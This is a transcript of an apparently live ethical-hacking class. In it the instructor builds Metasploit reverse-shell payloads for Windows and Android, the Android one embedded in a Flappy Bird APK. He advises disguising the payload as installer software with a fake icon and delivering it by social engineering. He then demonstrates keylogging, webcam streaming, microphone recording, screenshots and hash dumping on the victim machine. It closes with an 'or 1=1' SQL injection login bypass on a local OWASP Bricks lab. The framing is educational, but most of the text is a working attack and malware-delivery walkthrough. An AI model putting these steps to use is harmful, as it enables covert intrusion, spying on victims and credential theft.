Hello everyone. Good evening. Welcome back. Can you all hear me? Sorry, there was some technical issue. I wasn't able to log in. Am I audible? All right, perfect. Fine. So we'll just continue with where we had left off previously. I will just log into Kali Linux and then share my screen. Okay. So we were dealing with Metasploit framework, right? So how to log into Windows. That is what we were dealing with. Right? So we'll just try to do this. Okay, just giving ls cd. I actually need to create this thing, whatever we did, right? So here I actually have to make a change here in the local host because obviously the IP address has changed. Maybe the same, but most often gets changed. So right now my IP address is this thing 192.168.29.16. Let's just copy this and then replace it with this IP address. And then I'm gonna say create a new payload. Right, so using the Metasploit itself. And on the other hand, I'm going to open up something called as the MSF console as well. Probably split the screen into half. Okay, it starts the Metasploit framework or the console in here. Right, so it has saved it as output2.exe, the file. So I just have to give mv output2.exe, move it to the desktop, and now in the desktop I should be able to find that. So I've got the output2.exe file on the desktop. So here I need to make a few changes in this, right? So what all things I need to change in this place is that I have to set the payload. Like first I will give show options, right? So there are so many things. Okay, not this. Just click on options here. Okay. So in this, I will first click on MSF console. Then let me use the exploit slash multi slash handler, right? So this is what I'll be using, right? I'm configuring it to use a reverse TCP shell payload so that it gets the connection using the TCP IP protocol, right? And then I'm going to set the payload as, right, so we wanted it for Windows, so we'll just set it as Windows slash metapreter. Okay, I think the work of this terminal is done, so maybe we can just zoom this then. Set payload Windows metapreter slash reverse underscore TCP. Yeah, so we have set this as the payload. So after setting the payload, we have to set the host and the port. So this host, this L host which is there, it is our own IP address. So I just have to paste my IP address. Set L port is again a port number which I'll be using for this, which is 4444. Right, so now just to confirm, I'm gonna give show options to see the setting. Right, so just you have to worry about the L host and the L port here. Right, the listener address, any interface may be specified, the listener's port. Okay, so these are the two things. Listeners are us, that is what we are doing on this Kali Linux, that is what is a listener. Now I've set the Windows metapreter reverse TCP, right? So once I do this, I can just click on the exploit option, right? So just it says started the reverse TCP handler on this port in this IP address. So now what we are supposed to do is that I have to share this file to the victim. Right? So how I share this file to the victim is something which you can follow any method, right? So all you need to do is put this file and then it needs to be opened by the victim, right? So you can probably call it as a, say some installation file to like some downloading some game or some file like a, say for example I've got this thing, a Mozilla Firefox, right? And then say I've got this Compass, I've got this Adobe Illustrator, VirtualBox. So I can probably name it as this Oracle VM VirtualBox and then send it to the person whoever wants it. And then I can change this icon, right? So I can make all of these changes. Say for example, I can change this output2.exe does not really have any icon on it. So I can just add one icon for this. Right, so this is possible just by using a WinRAR file. Like so, from Kali you just export it to your own Windows system, and then from that you change the icon and then share it to the victim. Right. So for sharing it, I use a link called as vtransfer.com, which will give me a link. So via that link, I can actually share this file. So it's like you can use your own social engineering method, whichever you feel is appropriate, and then share. So once you get this, and so let me just see for the link here. Copy link. This link, imagine that this Windows system is my victim. Okay. Imagine this Windows system is my victim. And my victim has now opened this link. And there is a file which the victim has to download. Okay. So basically, you are not going to do this. You're not going to share this link and then ask the person to download and everything, right? So it's like you will directly send it via some interesting method in social engineering. Okay, I probably put it along with an image, put it along with a file, right? So you can actually embed your payloads, hide it, right? All of those things you can do. Okay, so it says thread found. I will just have to disable this thing because these payloads are not yet undetectable. Right, for now, let me just turn this thing off. Okay, so once you've downloaded this file, and as soon as the victim opens this file, just run, and we can go back to this page, right? So if I just come back in here, that file has now been opened. Right, so this metapreter session begins immediately as soon as I open the output2.exe file, right? So where exactly was that file? It is in the downloads, but then I have just opened it, correct? This file is here, and I've opened it. So immediately as soon as this is open, it says sending stage for the initiation of connection. Metapreter session 1 is opened at this thing. So now in this metapreter, there are a lot of things which you can do. Click on help. It will give you all the details. There are so many commands which is there in this Metasploits metapreter. Basically, you can just say get the machine's ID. You can migrate the server to another process. You can quickly switch over to other session. You can force the metapreter to go quiet. Now we will see something which we generally use. Say if you wanted to create a new folder, right? So we'll just try to create those things using the same mkdir and then rm and rmdir, ls, pwd, all of these things we can just use to create a new folder, right? So if I just wanted to go to say, let me give ls, right? So it will tell me, it will give me a list of all of these things, right? So clear or cls. Okay. So now if I just give pwd, it is telling me which location I am in. So if I just give cd desktop, okay, cannot file the file, right? So cd space dot dot and then give pwd or give ls. Right, so here I think there is desktop cd desktop. Now if I just give pwd, I'm on the desktop. So here also there are a lot of files, correct? So in this place, I will just create a new folder, like give mkdir, right? So mkdir, I'm just calling it as hack, right? So it has just created a directory called as hack. So if I wanted to know this thing, I will just give something like a screenshot, right? But then since I'm running on the same screen, it will give me a screenshot of this Kali machine as well. So just click on screenshot. Okay. So it says screenshot captured and then save to this place. That's a home/Kali has got this screenshot right now. Let me just go to home and then go to Kali. So it has immediately captured a screenshot as soon as I clicked it. So me minimizing it did not really work. And so basically this is the image. Okay, it did. Fine. So it took about 1 or 2 seconds to take the screenshot. So in that time I had just minimized. So it's giving me the thing about this machine. Okay. Fine. So it has given me the screenshot. right? So if this was my machine, okay, but then it has given me a screenshot of this victim's machine, which I've got right now. Fine, that's saved here. Okay, so just going back here, screenshot has been saved. So next, let me just give. Okay, we've created this directory, right? mkdir hack. So you should find this folder hack, right? So which is created from the metapreter initiated sessions, right? So in this, if I just give what are all the other help commands, right? So there is something like I can actually capture the keystrokes as well, right? So if I wanted to know the IP config, like the display interfaces for a Windows system, it is IP config, Linux system, it is IF config, display the host ARP cache, current proxy configuration, display the network connections, forward a local port to a remote service. I can do any of these things. Then if I wanted to know the details about this, I can actually say check with sysinfo. Sysinfo should give me the system information of that system which I have, which is the victim. Computer name along with the operating system, the architecture, the language, domain, logged on users, what is the metapreter working on, every single thing it's going to give. It's in fact going to give you the version or the build of the Windows as well. Okay, and then if I give get UID, sorry, I think it was get UID, server username also it is going to give me, right? So every single thing it's going to give me. Now the same thing I can just do something like I can reboot the remote computer. I can reboot it. I can shut down the remote computer or shut it down. I can also suspend or resume a list of processes. Then other than that, this is something interesting using the user interface commands, like you can get all the accessible desktop and Windows stations, right? So it's like if I just give nm desktops, that will tell you what all desktops are available to use. You can just use that. So this is something which is important, right? Like your keystrokes. We did the keylogger, right? So Metasploit is like combining all of these things. Metasploit gives you the screenshot. Metasploit gives you the keystroke. It can also send the mouse events. Like if you wanted to click on some place using the mouse from the metapreter, right? So it's like on the victim's computer, you wanted to use the mouse if you wanted to control, right? So then you can actually send the mouse events also. So here if you just click, it is going to send the keystrokes, right? So keyboard underscore send is going to send the keystrokes, right? So okay, I have to specify the input string, right? So it'll just give me the keystrokes for about 50 things, I guess. So just give notepad. So just type something. Okay, right. So I don't think it really gave anything in here, right? So let me just type this thing keyboard send again and then give say help. Okay, fine. So I think there is one more thing here. Yeah, this one we will just capture. Okay, actually once you start and then stop, after that you have to give the keyboard send. So you just give keyscan underscore start. Keyscan underscore start is what you have to do. Starting the keystrokes sniffer. So let's give welcome to the ethical hacking session online. Learn cybersecurity. Okay, and then I will just give keyscan underscore stop. Right, so it stops the keystroke sniffer. And then what we will try to do is we will just see keyboard underscore send. 100. Okay, it says done. Right, so I think somewhere here it should be saved. Is it available here? No. Okay. Um, just a minute. Maybe there is some other command to actually get those. Yeah, key scan dump, I guess. Key scan underscore dump. Yeah. Incorrect function. Actually, the key scan itself should be giving us the thing. Just a minute. Just trying to figure out what is not, why it is not coming. Accessing all the details, the command is going to be help. The webcam option, yeah, we'll just see that. Actually, we just have to give keyscan underscore starts the command for the keylogger, right? And then just give dump to dump all the keystrokes, right? So whatever you type should actually be there, right? So what if I give key scan underscore stop? Let me first stop. Okay, it says no. Key scan underscore starting, right? And then I can just type something here, this backspace, and then key scan underscore stopping, then key scan underscore dump. Okay, that's weird. It has dumped the keystrokes, but then it's not able to display it. Yeah, but then this is the thing. Dump the keystroke buffer is what we do. Okay, so it's actually not being showing here also, or else it'll just display it here. Let me see if it's saving in some other place. No. Okay, but I think you understood what to do in this, so it should be working in yours. Maybe in mine, I'll just have to reset something and then try again. Okay, so what other things we can see is how to send the mouse events we can see, and then we can also see how to actually say use the webcam commands. You can share the screen. What's the remote user desktop in the real time also. We can see all of those things. Okay. So how to first send the mouse events to control a mouse, right? So we'll just see one example, one small example for this. So just give mouse, right? It'll give me all the options. Okay. So I can just give mouse and then I can mention what to do, what not to do, which actually to do. So I can just give mouse and then give click 1 space 1. Right? So it's clicking at this place, 1 space 1. So if I just give mouse click 200 space 200, it's gonna click somewhere here, right? According to the screen resolution, right? So maybe if I just give this option that mouse click 500 comma 10, right? So wherever is the 500 comma 10, it's actually gonna click that. Right? The problem is that we have got both of our virtual machines and the victim on the same screen. That's why it's actually not able to show you properly. But then if I just wanted a mouse move, say for example, we'll take what was written there itself, 640 comma 480, right? So it's gonna give me the mouse here in this place, wherever it was. Right, so I can give a right click, I can give a move up, down, click, right down, right up, double click also can happen. Right, so it's like according to this, you take a screenshot, you see its position, and then according to that, you can make your mouse clicks also by using the meterpreter. Okay, so other than that, right, so we can just see how to record the mic also. It will just record the microphone. I think for 10 seconds or something, it can actually record the microphone. Right, so you have got an option to change the number of time, amount of time for which it actually records. So here are the 1 second recordings. So you actually have to give a bigger number so that it records for that. So here it does not really bother about the permissions at all. So it's just gonna record automatically. So if you want to play a .wav file on the target system, you can just play it. Right? So you need to specify the path, and then it will automatically play this .wav file on the victim's computer. Okay, right. So first, if you wanted to take a webcam, right? So you just give webcam underscore list. So in this, I've got a webcam which is one, right? So just a second, webcam underscore snap is just going to take an image from the webcam. So let me just give webcam underscore snap, right? So if I just give webcam underscore snap, it is going to give actually my webcam is sealed, so it will definitely take an image. It will get a frame, but I've just put this thing wherein my webcam is not turned on. Right, so if there was an actual thing wherein the webcam camera or the shutter wasn't there, right, then it would be here that if the camera driver and everything is working there on the thing on the victim, then you would get an image. But then yeah, it has captured this frame, so it's just gonna save this. Right, so similarly, I can also give the webcam underscore stream to play a video stream from a specified webcam. Then you can just start a webcam underscore chat. Right, so if I just give webcam underscore stream, right, so I can also get that thing. It's continuously gonna stream this from the webcam. Right, so you can just give enter. It will start a stream here. It says playing current status, target IP, what is the start time. So it is now turned on the webcam, and whatever it is, accordingly you will get the continuous view of that thing. Okay, so I think I can just close it now here. Close tabs. That's it. Still streaming. It has opened the player. I can just press enter. I'll actually wait for it to stop this thing. Maybe give a control C. Yeah. So we have interrupted it. So you just get a stream continuously. You've got the frame there. You got the stream here. There is one more thing that you can just start a video chat. Not sure what this is. You can just check this webcam underscore chat. Wherein I think there'll be a thing to even send messages inside that, I guess. Okay, cannot file the file specified. Fine, so this thing is not that, but then yeah, you can capture the images, you can capture the stream directly the video from the webcam as well, right? So these things are possible in the webcam features, right? Other than that, yeah, if you wanted to play some file there, you have to just give play and then space, mention the location, it's gonna play a file in the target system or in the victim system, right? So we saw a little bit about keystrokes and then the mouse also. Right, so if you wanted to dump some hashes which are there, right? So sometimes some very important things will be saved in the hashes as well. You can just get the hash dump. Okay, you actually have to mention the database link or the space where it is there. You have to mention that as well. Okay, so this is how you get access to the meterpreter. I can just give background. So it's backgrounding that session. So if I just give sessions, so I've now come out of that session. So it's telling that yes, this is active. Meterpreter session is active right now, so that I can just log in. So I've come out of that meterpreter now from the exploit part. I have come out. I can just continue just by going in again, right? So maybe I'll give session hyphen I and one, right? So it has started the initiation or interaction with the session one. What if you had multiple sessions? Like what if you had multiple people opening that thing and you had got multiple sessions? So that time you can actually keep one session in background and then exploit and open the other session and then initiate a connection with that session. So here you will have ID 2, 3, 4, 5. Accordingly, you can just set whichever thing you want to connect with. Right, so that is something which you can do on Metasploit and Meterpreter. So I'll just exit. The session has closed and then give exit. Just come out of this terminal. Right, so this is how you use Metasploit for a Windows machine. Right, and then we'll quickly see how to use it on a mobile phone, right? So it's like we can create an APK file also. So here I think you can already see one example which is there here. There is this app called as Flappy Bird. Inside that you can actually embed a payload, right? So that is what I'll just tell you now, how to actually embed a payload inside that and then check. Okay, so very similar to how you created this thing, we will just write a code. Okay, so we need to get this app, right? So from where did I get this app? So it's like any APK file you can take. So I'll just show you from where I got this app. So this app in particular is like, it looks like a game and other things, right? So just search for Flappy Bird APK. This is the file which you get, right? So just open it from this link, the EN Softronic link we can just open. Right, and then just free download. It will allow you to download this file, right? So you just have to wait until it loads and other things. Right. In the meantime, I've already got this file. So what all things I will do is I will just give MSF Venom. Actually, there are a few things which we will have to install. A few requirements are there here, okay, for this Android file. So just click on this download. It will download a file. Okay. So I have already got this file. It's present right here. So MSF Venom, I'm giving instead of this hyphen A, right? So I can just give help. Right, so what all things are there in this MSF Venom also, it's gonna list and then tell me, right? So in the first thing, what was that A which I had given there, right? First of all, A was the architecture to use for the payload and the encoders, correct? And then in some place, I think I written the platform, right? So this is the platform which we have got to mention, right? So if you just give hyphen list, sorry, hyphen list platforms, right? So it'll just give the list of all the platforms. Just a minute, it should give me a list. Okay, never mind, it was taking a little too long. So we'll just see in this help itself what all things are there. Like we have used the A, right? Let me just show you this command. MSF Venom A, right? So what all things were there? First we mentioned the architecture, then I'd given the platform as Windows, right? After that I gave hyphen P, right? What is this hyphen P? It is the payload to use. Right? So if you just give list payloads, it will give you the payloads. I mentioned the payload as Windows Metaprinter reverse TCP. Then I gave L host, L port, all that is fine. Right? Then I had this hyphen B. What is this hyphen B which I had used? Is there anything called as hyphen B? Yeah. So it was like characters to avoid, right? So the bad characters, I was like just avoid /x00, right? Because in most cases we will have these as the characters which are going to come while creating this payload. Okay. And then I mentioned hyphen E, which is the encoder, right? That thing makes sense. Encoder to use. There are a lot of encoders. Out of those, the best encoder was this Shikata GANAI. It was for this Windows thing. Okay. Hyphen I is the number of iterations to encode this payload so that we make this thing encrypted and encode and secure. 3. And then what is this hyphen F, right? So we'll just see what is this F. We're mentioning the output format, right? That this is the format which you have to use. It is the exe. Then hyphen O was the output file, telling that whatever payload you have created, save it as a file, right? So that file format can be anything, whichever we have mentioned here, that same format is going to be used. Right, so this is how we use the MSF Venom to create a Windows payload. And hyphen X, I will just give. Right, so here I have to mention Flappy underscore bird hyphen. Okay, it's already suggesting me all these things. This is the file name. Okay, .apk. Then it is asking me to mention the payload as Android / meter preter / again I'm taking the same reverse underscore TCP self connection itself. After that I'll just give lhost equals to, and once I give this lhost I will give the lport. So right now my lhost is different. Okay, I don't have the lhost, so that I'll have to go check it again. Let's just mention the lhost, and then I will mention the lport equals to, I'm giving 5555 as the lport now, local port, which is like my port. After that, here I need not mention about any encoder. I need not mention about any file format, because we know that by default it is just going to be a .apk. So I'll just give hyphen o. I'm calling it as Flappy bird.apk as my file name. Okay, .apk. Just press enter. Right. So this is a very simple thing for Android APKs. Okay, we'll just wait for it to actually finish this MSF Venom thing. Okay, it says invalid template. Okay, I think we are not in the correct folder or something. Yes, so this file is in the desktop, and I think where I am working from is right now pwd, it is in Kali. So I just have to go to cd desktop and then rerun this. And so now it should actually be able to take this and then create a payload, right? Okay, so we'll just wait for this thing to get over and that we create a payload like this. Just we'll just wait for 1 minute. What is actually L port? See, it's like for anything to access, you require some port number, right? So all of these are in the TCP IP ports, correct? Like if I wanted to access a web server, I use port number 80 for HTTP. I can use HTTP or I can use HTTPS on port number 443. Then I can actually use 8080 also. Like ngrok generally uses 3333 or 80 or 8080 for all of its things. In that way, Metasploit generally uses 4444 or 5555 for the port numbers, okay, to access. Now this port number here is the listener port, telling that we are going to initiate a connection on this port of this IP address. So basically, it is going to be like 192.168.29.16 ish to 5555 will have this access of the um, metapreter, whichever we open. It may be from the Windows system, it may be from the Android system. Right, so in this port, we will have the access. In this IP address is to the port, we will have the access. Okay, so now I think we've got this file which is created. So let me give ls. I should have a file here. Is there a file? Okay, malformed version number. Okay, I told you that there are a few requirements which we need to install. I think that is the error which we are getting. Please note that if you get these kind of errors, just a minute, I will tell you what you need to install. First thing is we need to give sudo apt-get update is necessary, Kali. Then I actually need to install something called as APK tool, right? So there is something like a Java JDK and an APK tool which we have got to install or add. Yeah, I think it says this malformed version, and then there is a payload error, APK tool not found. You need to add it to path, or you get this error for Java. Right? So it's like there are two things which we need to do. One is download APK tool for this, and one more is to install the default Java JDK. Right, just a minute. I will tell you there are like 3-4 commands which we need to do. Let this thing get downloaded first. First, please update your repositories. Right, so this is like doing system update. Okay, sudo apt-get update. Okay, this is gonna take a little time. Maybe in some other terminal I can just open and then give apt-get install APK tool, right? So just mention this -y and then give install. Okay. For me, it says APK tool is already the newest version. For you, it might not say. So you have to do this sudo apt-get install -y APK tool. Right? Please install this. Once that is installed, again, you will have to install the JDK. Okay. The command for JDK is sudo apt-get install default -jdk. Let's see if this thing works. Default Java development kit. Yeah, okay. It says Java development is also the newest version. Okay. And then if there is still this error, Just give sudo apt get or apt install. Let me just put this one last thing, zip a line. I think even this is installed. Yeah, for you, please check. One is APK tool, one is the default JDK, third is the sudo apt install zip align. Make sure you install this, and then hopefully this error should go. Gaurang, yeah, the same error I think you are also getting. Just run these three commands and then see here. Sorry, not this. This one. Okay, in mine it says that all of these things are ready. So I'm just going to rerun this exactly again. Okay, and then I think here in this MSF Venom, I'd use the X for the APK. This is to specify a custom executable file for that APK. Okay, and let this run in the background. And meanwhile, you can just check for those who are getting this error. This should help you. These three things. LS. Okay, still giving me that error. Okay, I've just tried this. Let us see if it works. Okay, fine. This thing is not really working. We'll just see. Let me just recheck on this. I will just take a photo of this. I'll get back to you in the next session with respect to this. Okay. Yeah, it's really simple. After this, we'll just see in here what to do about it. Java. Here, who is trying? Gaurang, were you able to create it? Maybe I just have to put it from some other thing. Maybe I'll try from this later on and then check. Did you get the same error, or you got the thing? Or anyone else who was just trying? Right? Because there are a lot of things which I've repeatedly kept installing. That's why maybe just caught up with something and got things. Okay, no problem. So I'll just let you know about it in the next thing. I'm just trying to upgrade in the background. Let's let this thing be working. Exit, exit. Okay. So next, what we were about to do, just a minute. What are we supposed to do in the next thing? Okay. So the next concept which we'll be dealing with is a little bit about what are SQL injections. Okay. So let me first type here what is a SQL injection. Right, so these occurs when you ask a user for input like a username or ID, and instead of that it gives you a SQL statement. Right, it's basically a SQL code which you get. So here what we will do is, this is the concept which we will be seeing, right? So based on 1:1 is always true, right? So we learn this thing, right? So this purpose is to create a SQL statement to select a user. SQL is structured query language, to select a user with a given user ID, right? So if there is nothing to prevent a user from entering wrong input, the user can enter some smart input like this, right? So if there is no option like in the places where I want to enter the password or something, correct? So in that place, if there is an option that if I just enter a wrong username or password, then it will give me wrong. In some cases, there will be this option that you cannot really have anything like that. That's it. To prevent a user from entering the wrong input, the user can enter something smart like this. Like you can just give 105 or 1:1, right? So then you will create a SQL statement, something like this. Right, so this is like first of all, you need to understand what is the SQL queries, like what is the select, what is the select star, and what happens if you just give select username, user ID, name, and password. Right, so first you need to understand all of these things, but very simple. I'll try to keep. There is one example which I will show you, right, on one of the applications. I will just show you. I will try to help you understand, because it's not uh, a simple thing that first you need to know about SQL and only then you can learn this, right? So what happens is SQL injection based on this equals to is always true is what we will try to do. Okay. So if I just enter John Doe and then enter this as the password, right? So you will get the username and password, right? So instead of this, the hacker can directly get access to username and password by inserting or equal to inside this username or password text box. Right? So if we just enter something like this, it will create a valid SQL statement. right? Or else you can give 1 equals to 1. Even that will also give a valid SQL statement, and then the person, the hacker, can actually uh, get the password, or they can bypass your passwords as well. Like, I'll just tell you simple terms. There are a few applications and a few servers which we need to download and then use. So I won't make you download. I've already got it downloaded and installed. I will tell you how to download and what to download. Okay. Firstly, there is something called as a there is something called as a Vamp server. I think some of you might have heard of this. Vamp server is a Windows web app development environment. Okay. So it has got a lot of other servers inside it. So Vamp is just a platform for Windows. Inside it, there are like lots of servers. Say if you wanted to use a MySQL server, then for databases it is there. For Apache web server it is there. Then for SSL support, Open SSL server it is there. PHP server it is there. MariaDB server is also there. Right. So what is this server used for? Used to host web pages or PHP pages. Okay. So WAMP stands for Windows Apache MySQL and PHP server, right? So this is for Windows server, Apache server, MySQL server, and then the PHP server. Right? Similar to this, there is also something called as XAMPP, right? It's all like very much similar softwares. Again, this is free and open source. This is, I think, from a thing called as from a company. I guess this is called as Bitnami, is where you get the XAMPP server. Right? So this also has a Apache distribution for MariaDB, PHP, Perl, Apache. Okay, fine. So we will be using the Vamp server for our example right now. Okay. So how exactly do you download this Vamp server? So it's like you just go to sourceforge.net as this website, right? And then just download, you get the Vamp server. After that, you actually have to install all of these things. Okay. You actually have to install the Vamp server and everything. So once you install, you get this file. Sorry, you get this option called as Vamp server 64. So you download this Vamp and install it from the site, from the SourceForge site. Then I will download one thing called as OWASP Bricks. OWASP OWASP Bricks login page is something which I have to go. Like first there is a thing which you need to download, this OWASP Brisk, and then I will download. So there is this website called as sechow.com. Right, from this I will go to downloads. Okay, first we'll see what is this OWASP Brisk Bricks. It's a web application security learning platform built on PHP and MySQL. Focuses on variations of commonly seen application security issue. Like each brick has some sort of security issue which can be leveraged manually or using automated software tools. Right? So it's like we have to break the bricks to learn the web application security. Right? So it is from OWASP. It's a completely free and open source project. Right? So here there are like three different categories or sections. One is like login pages, one is file upload pages, and then one more is content pages. Login page is like this. Login page one, basic login page, right? So credentials are all given. In this only we have got a few things for SQL which is mentioned. I'll tell you this. In this we will try to learn a little bit. And in this login pages also there are like 2, 3, 4, 5 login pages. Okay. So I'm gonna give you this thing itself for you to learn, for you to explore more, because we are not having that much time. First of all, you need to know SQL. For that, SQL query and SQL injections.
There are a few things which I will show you, one or two examples out of these things, but the rest you are going to refer to this only and then learn. Okay. So there are so many options how to bypass, what to give for the username, what is the password, and then what you get. Every single thing is available in this itself. Okay. So you also got the file uploader, a simple file upload, right? So this is like using a PHP shell, you can actually upload this, right? And then this has also got like three options. All of these are using PHP. Content pages are also there. Again, you can use the advanced SQL injection method. For this, you need to know advanced MySQL. Okay, like there are structured queries which you have got, right? SQL queries are there, right, on the post data and everything. So I will just show you a little bit of introduction to how you use this OWASP bricks thing. So first of all, to download and install this, what we do is I just go to this site, click on download, and here I've got so many options, right? So which I wanted is I will just download the 30th November. Okay, let me download the latest one, 2.21 2y. Right, so again, it's going to take me to this sourceforge.net itself. From here, it will actually download a zip file for me. I will have to extract it and go and then go inside this folder. So just open this thing up, the 2y version for OWASP bricks. Right, so it's just giving me this bricks. Right, so let me just extract this thing. Okay. Right, so I will now be getting a folder called as bricks, correct? So this thing will just be completely on the basis of Windows itself will keep. Right, so I'm just gonna go inside this bricks folder, and here there are options like there should be one thing called as local settings.php file. There is one thing called as local settings.php file. Just edit this, right? In this, there is a thing called as MySQL database username, the MySQL database password. Okay. So what I will do is I will just remove the db pass thing from the root, and I'm going to remove this password from this root. And then for my access, I'm just going to keep it like this for the MySQL database, right? And then what I will do is in the bottom right corner, we should have an option for Vamp, right? So first, okay, I don't think I've started this. In this, I should have an option for Vamp. Now that we have installed Vamp, and then this is the server. First, let me start this server. Let's give yes. It will probably open up here and also open up here. If it is not here by default, if it is started. Okay, it is trying to launch all the servers like PHP, and it has run the CMD and then the PHP myadmin and all the other things. Apache server also launched, MySQL server. So here I've got this option for WAMP. Right click on it. There are a lot of things like language, WAMP settings, tools, help. Right, so it's trying to log in or initiate all of the servers. So we'll just give it a little time. We'll just give it 1 minute. In the meantime, we have just made this change. Correct. After making this change, just close this bricks. Right, so that's enough in the bricks part. Not shut down here. In the bricks, I think that is sufficient. So this is initiated, and then the local server or the services have been running. Okay. Now, what I will do is, if I give a right click, I get all of these options like tools and everything. But then if I give a left click, it will give me the servers which are all running. Right. So right click is like for the settings and additional things. This is to stop and start all the services. So what I will do is, I will just select PHP. See, we wanted the Apache service. It has started the Apache. We wanted the MySQL. It has started the MySQL. We wanted Maria. Not required actually. Apache, PHP, and MySQL were the things which we wanted. Okay. So in this PHP, I will change the PHP version. If at all for you it is not in this, by default the PHP version will be 7.4. You have to change it back to 5.3. So now it's changing that PHP server's version to 7, right? So it's like you need to put it back to 5.6. That should be the version. And I think it is already refreshing this. So again, I will have to get it back. Left click, you will have PHP. You have to go to the version, put it in 5.6. For you, it will be 7.3 or 7.4 by default. Let us see what change did it make. Version 5.6. Okay. Once you set this as the version, I will just go to the browser. Once again, let me just check. Yeah. I will just go to the browser and then click on localhost slash bricks. So it should give me this OWASP bricks login page. That's it. Now it's able to load. It is not the web page. I am doing it from the localhost part now. Okay. Now in the menus, I'm just going to go to bricks and then the login pages. Okay. Now please remember that all of these things are from the localhost, not from the website, not from SecHow. It is running by using this Vamp server. So it's like now if I turn off the Vamp server, this is not going to work. Okay. So in this, I will just go to the login pages. I've got all of these login pages, login hyphen pages. And in the login, if I wanted to bypass the admin login page, right? So first it is connected to all of these things, right? So MySQL extension and everything. So just giving the username, right? So if I just give something, submit wrong username or password, okay? So it's giving me the SQL query here, what I give. I had given guest 205 and then I'd given this as the password. Select star from users where name is equal to and then password equals to. It gave me an error. So now let me just give admin and then I will give or 1 equals to 1. Okay. And password also I'm just going to give admin or 1 equals to 1 as the username and the password. So immediately it says that successfully logged in. So this is one way to bypass by using the 1:1 by using a SQL query. Actually I gave admin 1 equals to 1 or 1 equals to 1, right? So this is something admin or 1 equals to 1 I've just given. So it accepted that as a SQL query and then it was a valid SQL injection. So using that it was able to bypass this login page. Okay. So this is one way to bypass your SQL login page by using SQL injection. Okay. So if you just take this example for login page 1, right? So there are many things which are there here. I'll just try to show you one thing. So what is the query when the username is Tom and the password is just a single quote, right? So we'll just try to give Tom and then this is a single quote, right? So it says wrong username or password. That's it's giving me this thing here. Okay. So what if the username is Tom and password is exclamation space or 1 equals to 1, right? So if I just give this along with that username for Tom, now let us see if it is actually going to bypass it, login. Right, so now it says successfully logged in because we have given this as the password. This has accepted as a valid SQL query. Okay. So this is one more way how you can log in. Right, first things we saw, giving the 1 equals to 1 in the username as well as the password. But here we have used term, or it's like if you already know this username, the only thing bypass is the password verification. Okay, so that is what we did because we already knew the username as Tom. Okay, so now let me just take some other username like XYZ, and then here I'll put the same password. It will log in and give it to you, correct? By using the SQL query. It is successfully logged in, right? So it doesn't matter if it is guessed. Even here, if I give that same thing for this kind of login pages, it will say logged in. Okay, that is one example which they have taken. Right, so whatever we took here, if the username was Tom and then the password is Tom, I don't think it will bypass and then give you, right? So we'll just understand a little bit more in this. Okay, I think this was the default thing which was set. Yeah, yeah. So I think this one, it was actually accepting because username is Tom and password is also Tom, right? So it is searching the command. A SQL query is created and executed to search on the database to verify them. Right, so it searches in the users table where the name is Tom and password is Tom. If a matching entry is found, the user is authenticated. Okay. So in order to bypass this, SQL code has to be injected. This code has to be injected in such a way that SQL statement should generate a valid result on execution. Like if there is some error, it will not fetch and then give that not logged in. Right. So this is not a valid query. Right. So this is the query which it created when you give Tom and then a single quote. So this gave an error. When I give this, right, so this condition is always true. So this verification never happens directly. It is going to get logged in or then bypassed. Okay. So this is for your password bypass or authentication bypass. You can just use this. Now, if this is the thing, you will need a valid username. If you just give Tom and then this is the password, correct? So in this login page, the username was also susceptible to the or vulnerable to the SQL injection attacks. And so for that case, Tom and this also works. Or else, if there was an issue with this, then we had to give admin. Like if this was all not SQL injection, it was not vulnerable, then we have to give something like this. Since it is vulnerable, normal thing also works, right? So you just have to read this thing. That is why what we tried was admin or one. Immediately we had given this, right? So the first example which we saw, admin or one, right? So this is also vulnerable. This is also vulnerable. So we gave both of these things. Okay, right? So that is what you have learned in this login, like in the first login page, right? And the second login page, you will have like with client side validation. Okay, right? There is a client side security which you can actually see. Fine. So for this, you actually need a different thing like you need to have a temper data, live HTTP headers, and the SQL has to be injected into the output fields. Okay. So this is something a little more advanced which you have got. Right. I think for login page 3, there is some details like similar to the one which we have seen previously. Right. So this one you can explore. I can just give you this page for your reference, right? So I think you've understood the basic SQL injection, what you use, and how is the 1:1 condition applied there to bypass simple vulnerable SQL login pages. Yes, was that fine? Using the Vamp server. Okay, just a minute. I'll just stop here. Any questions you guys have? Yeah, any queries? Can we stop here? Can we wind up? Yeah, okay. When is your next session? If you don't have any questions, tomorrow, what time is your session hosted? Yes. Hello. Can you all hear me? Yeah. What time is the session tomorrow according to the update which you have got? It's from 6 to 7 p.m. Yes, it is from 6 to 7. Yeah, pretty much because we have tried to keep it very much with reference to your syllabus itself. Whatever are the important things we have tried to cover. 6 to 7. Perfect. Okay. Right. In this, I've given you this link. Please refer to this, read because SQL injection, just the basic one I've just taught you. Right. Other things a little bit you have to refer, and then we'll try to do a few more examples you can check out. I've told you what all things to do. I will actually give you this reference for how to set up all of these things as a .txt file. I'll just share it with you. It will be given to you on the group, right, so that you can just try and practice this SQL injection, whatever was taught to you. Okay. Fine. I think with that we can just wind up. I'll end the session now. If you don't have any doubts, you're free to leave. Thank you so much for attending. See you all tomorrow.